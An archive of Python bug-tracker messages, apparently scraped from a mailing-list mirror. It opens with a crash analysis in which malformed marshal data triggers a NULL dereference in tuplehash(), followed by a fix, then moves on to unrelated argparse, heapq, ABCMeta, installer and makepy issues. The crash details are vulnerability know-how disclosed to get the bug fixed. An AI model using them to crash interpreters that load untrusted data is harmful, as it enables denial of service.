PyRun_FileExFlags Python/pythonrun.c:933 #20 0x42e929 in PyRun_SimpleFileExFlags Python/pythonrun.c:396 #21 0x42caba in PyRun_AnyFileExFlags Python/pythonrun.c:80 #22 0x45f995 in run_file Modules/main.c:319 #23 0x4619c8 in Py_Main Modules/main.c:777 #24 0x41d258 in main Programs/python.c:69 #25 0x7f374629babf in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20abf) #26 0x41ce28 in _start AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV Objects/object.c:769 PyObject_Hash ==20296==ABORTING What happens when it tries to read int2 element: - int2 element is now a set of length 3 - add int4 element to the set - add tuple2 element -- when it adds an element to a set, it calculates a hash of the element -- when it calculates a hash of a tuple, it calculates hashes of all elements of the tuple -- while calculating a hash of tuple2, it calculates a hash of tuple1 since #float3 now is a TYPE_REF which points to tuple1 -- but tuple1 is not complete yet: length of tuple1 is 4, but only string1 was added to it -- tuplehash() function reads a length of a tuple, and then calls PyObject_Hash() for each element -- but it doesn't check if all elements were added to the tuple -- as a result, a null-pointer dereference happens in tuplehash() while reading second element of tuple1 https://hg.python.org/cpython/file/tip/Objects/tupleobject.c#l347 ... static Py_hash_t tuplehash(PyTupleObject *v) { Py_uhash_t x; /* Unsigned for defined overflow behavior. */ Py_hash_t y; Py_ssize_t len = Py_SIZE(v);<= for tuple1 it returns 4, but tuple1 contains only one element (string1) PyObject **p; Py_uhash_t mult = _PyHASH_MULTIPLIER; x = 0x345678UL; p = v->ob_item; while (--len >= 0) { y = PyObject_Hash(*p++);<= null-pointer dereference happens here while reading second element ... I could reproduce it with python3.5, and latest build of https://hg.python.org/cpython (Aug 20th, 2016). 
Here is a simple patch which updates tuplehash() to check "p" for null:

diff -r 6e6aa2054824 Objects/tupleobject.c
--- a/Objects/tupleobject.c Sat Aug 20 21:22:03 2016 +0300
+++ b/Objects/tupleobject.c Sat Aug 20 23:17:16 2016 -0700
@@ -355,7 +355,13 @@
     x = 0x345678UL;
     p = v->ob_item;
     while (--len >= 0) {
-        y = PyObject_Hash(*p++);
+        PyObject *next = *p++;
+        if (next == NULL) {
+            PyErr_SetString(PyExc_TypeError,
+                "Cannot compute a hash, tuple seems to be invalid");
+            return -1;
+        }
+        y = PyObject_Hash(next);
         if (y == -1)
             return -1;
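On interpreters that reject this class of malformed input, corrupting marshal data raises an exception instead of crashing. A minimal sketch of the expected behavior (the corrupted byte offset is arbitrary, and the exact exception type may vary by version, so several are caught):

```python
import marshal

# Round-trip works on well-formed data
value = ("this is a string", [1, 2, 3, 4])
dump = marshal.dumps(value)
assert marshal.loads(dump) == value

# Corrupt the leading type-code byte; a safe interpreter should reject
# the data with an exception rather than dereference a NULL pointer
data = bytearray(dump)
data[0] = 0x7F  # not a valid marshal type code
try:
    marshal.loads(bytes(data))
    print("no error raised")
except (ValueError, EOFError, TypeError) as exc:
    print("rejected with", type(exc).__name__)
```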
[issue21613] Installer for mac doesn't store the installation location
New submission from Artem Ustinov:

I'm trying to automate the Python uninstallation on Mac, but I've found that the actual installation location is not stored for Python packages. That location is required since pkgutil keeps track of installed files (if you run $ pkgutil --files org.python.Python.PythonFramework-3.4) but doesn't store the absolute paths for those files.

1. Run $ pkgutil --pkgs=.*Python.*3\.4

Here's the expected output:

org.python.Python.PythonApplications-3.4
org.python.Python.PythonDocumentation-3.4
org.python.Python.PythonFramework-3.4
org.python.Python.PythonInstallPip-3.4
org.python.Python.PythonProfileChanges-3.4
org.python.Python.PythonUnixTools-3.4

2. Run $ pkgutil --pkg-info org.python.Python.PythonFramework-3.4

Here's the output:

package-id: org.python.Python.PythonFramework-3.4
version: 3.4.1
volume: /
location: (null)
install-time: 1401373546

Actual result: the location property is (null)
Expected result: the location property should be '/Library/Frameworks/Python.framework'

-- assignee: ronaldoussoren components: Installation, Macintosh messages: 219393 nosy: ronaldoussoren, ustinov priority: normal severity: normal status: open title: Installer for mac doesn't store the installation location type: behavior versions: Python 3.2, Python 3.3, Python 3.4

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue21613 ___
___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment:

It does the trick with optionals but not with positionals. How can positional arguments be removed/hidden?

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment:

What is the way to 'hide' an argument from being parsed? E.g. we have self.parser.add_argument('foo') in the parent class; how can we modify it in the child class so that it does not appear in the --help output and is not populated into the child's Namespace?

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___
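For optional arguments, argparse can already do both halves of this via argparse.SUPPRESS; the open question in the thread is positionals. A minimal sketch (the option name --legacy is invented for illustration):

```python
import argparse

parser = argparse.ArgumentParser(prog="tool")
# help=argparse.SUPPRESS hides the option from the --help text;
# default=argparse.SUPPRESS keeps the attribute out of the Namespace
# unless the user actually passes the option
parser.add_argument("--legacy",
                    help=argparse.SUPPRESS,
                    default=argparse.SUPPRESS)

ns = parser.parse_args([])
print(hasattr(ns, "legacy"))   # the attribute is absent when not given
ns = parser.parse_args(["--legacy", "x"])
print(ns.legacy)
```

This hides the option cleanly; positionals cannot be skipped the same way because they are matched by position, which is what motivates the remove_argument() request.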
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment:

Paul, essentially, what I'm looking for is to replace the 'help' string of the inherited argument with a new one. If you say it can be changed without any side effects, what would be the proper way to do that using argparse?

Artem

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___
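One way to replace just the help string of an inherited argument: add_argument() returns the Action object, and a subclass can keep a reference to it and mutate its help attribute, since the help text is only read when the parser formats its output. A sketch under that assumption (the class and option names are invented for illustration):

```python
import argparse

class BaseTool:
    def __init__(self):
        self.parser = argparse.ArgumentParser(prog="tool")
        # keep a reference to the Action so subclasses can tweak it
        self.foo_action = self.parser.add_argument(
            "--foo", help="generic help")

class ChildTool(BaseTool):
    def __init__(self):
        super().__init__()
        # replace the inherited help string in place
        self.foo_action.help = "tool-specific help"

print(ChildTool().parser.format_help())
```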
[issue19462] Add remove_argument() method to argparse.ArgumentParser
New submission from Artem Ustinov:

In order to migrate from optparse to argparse we need the ability to substitute arguments, i.e. remove and then re-create them. In our framework we use a command-line-utility base class and then inherit the particular tools from it. The parser in the base class uses add_argument() to populate the general argument list, but some tools need to modify the inherited argument set and give some arguments a modified meaning. With optparse we just used remove_option() and then added the modified one with add_option(), but argparse currently does not have this functionality. For the purpose above we just need remove_argument() or modify_argument() methods in argparse.

-- components: Library (Lib) messages: 201832 nosy: ustinov priority: normal severity: normal status: open title: Add remove_argument() method to argparse.ArgumentParser type: enhancement versions: Python 3.2

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment:

We need argparse to raise an error for conflicting options, and that's why we need to implicitly substitute an option when we need it.

On 31 Oct 2013 19:54, R. David Murray rep...@bugs.python.org wrote:
> R. David Murray added the comment:
> Does conflict_handler='resolve' address your use case? It sounds like it should.
> -- nosy: +r.david.murray

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___
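For context, conflict_handler='resolve' lets a later add_argument() with the same option string replace the earlier definition instead of raising ArgumentError (which the default 'error' handler would do). A minimal sketch (the --mode option is invented for illustration):

```python
import argparse

parser = argparse.ArgumentParser(conflict_handler="resolve")
parser.add_argument("--mode", default="base", help="base behavior")
# with 'resolve', redefining the same option string replaces the
# earlier action rather than raising an ArgumentError
parser.add_argument("--mode", default="child", help="child behavior")

print(parser.parse_args([]).mode)        # the later definition wins
print(parser.parse_args(["--mode", "x"]).mode)
```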
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment:

Explicitly substitute, excuse me.

On 31 Oct 2013 20:11, Artem Ustinov rep...@bugs.python.org wrote:
> Artem Ustinov added the comment:
> We need argparse to raise an error for conflicting options, and that's why we need to implicitly substitute an option when we need it.

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___
[issue19018] Heapq.merge suppresses IndexError from user generator
New submission from Artem Fokin:

Suppose we have the following code:

from heapq import merge

def iterable():
    lst = range(10)
    for i in xrange(20):
        yield lst[i]

it1, it2 = iterable(), iterable()
print list(merge(it1, it2))  # no IndexError
# output is: [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9]

The reason is that in heapq.merge (http://hg.python.org/cpython/file/7c18b799841e/Lib/heapq.py#l372) the try/except clause for IndexError is too broad:

while 1:
    try:
        while 1:
            v, itnum, next = s = h[0]   # raises IndexError when h is empty
            yield v
            s[0] = next()               # raises StopIteration when exhausted
            _heapreplace(h, s)          # restore heap condition
    except _StopIteration:
        _heappop(h)                     # remove empty iterator
    except IndexError:
        return

s[0] = next() may also raise different kinds of exceptions, including IndexError, which will be silently suppressed. For example, this loop can be rewritten as:

while 1:
    try:
        while 1:
            try:
                v, itnum, next = s = h[0]   # raises IndexError when h is empty
            except IndexError:
                return
            yield v
            s[0] = next()               # raises StopIteration when exhausted
            _heapreplace(h, s)          # restore heap condition
    except _StopIteration:
        _heappop(h)                     # remove empty iterator

-- components: Library (Lib) messages: 197726 nosy: afn priority: normal severity: normal status: open title: Heapq.merge suppresses IndexError from user generator type: behavior versions: 3rd party, Python 2.6, Python 2.7, Python 3.1, Python 3.2, Python 3.3, Python 3.4, Python 3.5

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___
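On versions where the overly broad except IndexError has been removed, an IndexError raised inside the user's generator propagates out of merge() instead of silently truncating the output. A Python 3 sketch of the reporter's test, assuming a fixed heapq:

```python
from heapq import merge

def iterable():
    lst = range(10)
    for i in range(20):
        yield lst[i]  # raises IndexError once i reaches 10

# With the fix, the generator's IndexError surfaces to the caller
# instead of being mistaken for the internal "heap is empty" signal
try:
    result = list(merge(iterable(), iterable()))
    print("bug still present: got", len(result), "items")
except IndexError:
    print("IndexError propagated")
```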
[issue19018] Heapq.merge suppresses IndexError from user generator
Changes by Artem Fokin ar.fo...@gmail.com:

-- versions: -3rd party, Python 2.6, Python 3.4, Python 3.5

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___
[issue19018] Heapq.merge suppresses IndexError from user generator
Artem Fokin added the comment:

Oh, it seems that in the current cpython branch this problem is fixed by checking the condition _len(h) > 1: http://hg.python.org/cpython/file/1dc925ee441a/Lib/heapq.py#l373

But is it possible to fix it for the previous branches?

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___
[issue19018] Heapq.merge suppresses IndexError from user generator
Artem Fokin added the comment:

Which branch should I add a unit test to? Here is a patch that adds a unit test to the current one.

-- keywords: +patch Added file: http://bugs.python.org/file31760/unittest_patch.diff

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___
[issue13264] Monkeypatching using metaclass
New submission from Artem Tomilov scrapl...@gmail.com:

from abc import ABCMeta

class Meta(ABCMeta):
    def __instancecheck__(cls, instance):
        # monkeypatching class method
        cls.__subclasscheck__ = super(Meta, cls).__subclasscheck__
        return super(Meta, cls).__instancecheck__(instance)

    def __subclasscheck__(cls, sub):
        return cls in sub.mro()

class A(object):
    __metaclass__ = Meta

class B(object):
    pass

# registering class 'B' as a virtual subclass of 'A'
A.register(B)

>>> issubclass(B, A)
False
>>> isinstance(B(), A)  # => method __subclasscheck__ is now monkeypatched
True
>>> issubclass(B, A)    # => desire to get 'True' because 'B' is a virtual subclass
False

-- components: None messages: 146366 nosy: Artem.Tomilov priority: normal severity: normal status: open title: Monkeypatching using metaclass type: behavior versions: Python 2.7

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue13264 ___
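For comparison, plain ABCMeta already gives consistent answers for registered virtual subclasses without any monkeypatching, because ABCMeta.__subclasscheck__ consults the registry for both issubclass() and isinstance(). A Python 3 sketch (the report uses the Python 2 __metaclass__ spelling):

```python
from abc import ABCMeta

class A(metaclass=ABCMeta):
    pass

class B:
    pass

A.register(B)  # B becomes a virtual subclass of A

print(issubclass(B, A))   # True: ABCMeta checks the registry
print(isinstance(B(), A)) # True: consistent with issubclass
```

The inconsistency in the report comes from overriding __subclasscheck__ with a version that only walks the MRO and therefore ignores the virtual-subclass registry.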
[issue7618] optparse library documentation has an insignificant formatting issue
New submission from Artem vazovsky@gmail.com:

In the optparse documentation, at the end of the first chapter, there is an example which shows how optparse can print a usage summary for the user. In the last row of this example the text color accidentally changes from black to blue. Most probably the source of this issue is a single-quote character which is misinterpreted by the code highlighter.

-- assignee: georg.brandl components: Documentation messages: 97119 nosy: georg.brandl, vazovsky severity: normal status: open title: optparse library documentation has an insignificant formatting issue versions: Python 3.1

___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue7618 ___
makepy generates empty file
Hi,

I am trying to use makepy to generate wrappers from a *.tlb, for example for the Google Desktop Search SDK (http://desktop.google.com/downloadsdksubmit). However, makepy generates only a very short __init__.py and no other files. Unfortunately, I am quite new both to Python and COM and can hardly guess what's wrong :( Please, help.

Here is the contents of the generated __init__.py if it helps:

# -*- coding: mbcs -*-
# Created by makepy.py version 0.4.92
# By python version 2.4 (#60, Feb 9 2005, 19:03:27) [MSC v.1310 32 bit (Intel)]
# From type library 'GoogleDesktopComponentSample1.dll'
# On Sat Apr 09 01:48:14 2005
GoogleDesktopComponentSample1 1.0 Type Library
makepy_version = '0.4.92'
python_version = 0x20400f0

import win32com.client.CLSIDToClass, pythoncom
import win32com.client.util
from pywintypes import IID
from win32com.client import Dispatch

# The following 3 lines may need tweaking for the particular server
# Candidates are pythoncom.Missing and pythoncom.Empty
defaultNamedOptArg=pythoncom.Empty
defaultNamedNotOptArg=pythoncom.Empty
defaultUnnamedArg=pythoncom.Empty

CLSID = IID('{3921D68F-6B14-4189-BA5D-2117A9DE67B6}')
MajorVersion = 1
MinorVersion = 0
LibraryFlags = 8
LCID = 0x0

RecordMap = {
}

CLSIDToClassMap = {}
CLSIDToPackageMap = {
    '{95DA1281-AEB5-45A4-A71A-B2E57EA41E0F}' : 'IndexShortcut',
    '{452FE2BF-D9C4-43FD-9137-78AE170C3EB3}' : 'IIndexShortcut',
}
VTablesToClassMap = {}
VTablesToPackageMap = {
    '{452FE2BF-D9C4-43FD-9137-78AE170C3EB3}' : 'IIndexShortcut',
}

NamesToIIDMap = {
    'IIndexShortcut' : '{452FE2BF-D9C4-43FD-9137-78AE170C3EB3}',
}

--
http://mail.python.org/mailman/listinfo/python-list